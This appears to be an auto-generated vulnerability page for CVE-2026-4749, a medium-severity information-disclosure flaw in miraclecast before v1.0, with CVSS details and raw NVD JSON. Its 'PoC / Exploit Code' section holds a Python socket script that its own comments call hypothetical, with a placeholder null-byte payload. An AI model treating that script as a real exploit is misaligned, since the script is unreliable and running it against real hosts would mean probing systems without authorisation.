Security Vulnerability Report
中文
CVE-2026-4749 CVSS 6.5 MEDIUM

CVE-2026-4749

Published: 2026-03-24 06:16:23
Last Modified: 2026-05-05 20:38:41

Description

NVD-CWE-noinfo vulnerability in albfan miraclecast.This issue affects miraclecast: before v1.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

miraclecast < v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-4749 (Conceptual) # Note: As the vulnerability is marked as 'NVD-CWE-noinfo', # specific exploit steps are hypothetical. This script demonstrates # a generic adjacent network interaction attempt. import socket import sys def send_exploit(target_ip, target_port): try: print(f"[*] Attempting to connect to {target_ip}:{target_port}...") # Create a TCP socket (Adjust protocol if UDP is used by miraclecast) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) # Connect to the target s.connect((target_ip, target_port)) # Hypothetical payload to trigger information disclosure # This payload is a placeholder as the exact trigger is unknown. payload = b"\x00\x00\x00\x00" s.send(payload) print("[+] Payload sent.") # Receive response response = s.recv(4096) print(f"[+] Received response: {response}") if response: print("[!] Potential sensitive data received.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Usage: python3 poc.py <IP> <PORT> if len(sys.argv) < 3: print("Usage: python3 poc.py <target_ip> <target_port>") sys.exit(1) TARGET_IP = sys.argv[1] TARGET_PORT = int(sys.argv[2]) send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4749", "sourceIdentifier": "[email protected]", "published": "2026-03-24T06:16:23.120", "lastModified": "2026-05-05T20:38:41.080", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVD-CWE-noinfo vulnerability in albfan miraclecast.This issue affects miraclecast: before v1.0."}, {"lang": "es", "value": "NVD-CWE-noinfo vulnerabilidad en albfan miraclecast.Este problema afecta a miraclecast: antes de la v1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://github.com/albfan/miraclecast/pull/555", "source": "[email protected]"}]}}